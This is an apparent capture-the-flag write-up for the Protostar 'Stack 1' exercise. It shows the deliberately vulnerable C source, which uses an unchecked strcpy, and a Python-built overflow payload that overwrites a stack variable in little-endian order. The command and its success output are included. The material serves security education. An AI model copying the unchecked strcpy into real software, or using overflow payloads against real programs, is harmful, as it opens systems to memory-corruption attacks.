hacking-writeups

View the Project on GitHub HarishgunaS/hacking-writeups

Stack 1

Stack 1 source

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  if(argc == 1) {
      errx(1, "please specify an argument\n");
  }

  modified = 0;
  strcpy(buffer, argv[1]);

  if(modified == 0x61626364) {
      printf("you have correctly got the variable to the right value\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }
}

This program does not take stdin, so cannot be piped to. Requires commandline argument instead.

Instead of manually crafting an input argument, I created one using python.

print("A"*64 + "\x64\x63\x62\x61)

Output

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAdcba

Shell command

./stack1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAdcba

Output

you have correctly got the variable to the right value

This was another simple buffer overflow, but this time the value to write must be crafted carefully. Order of byte writing is emphasized, teaching the concept of little endian representation.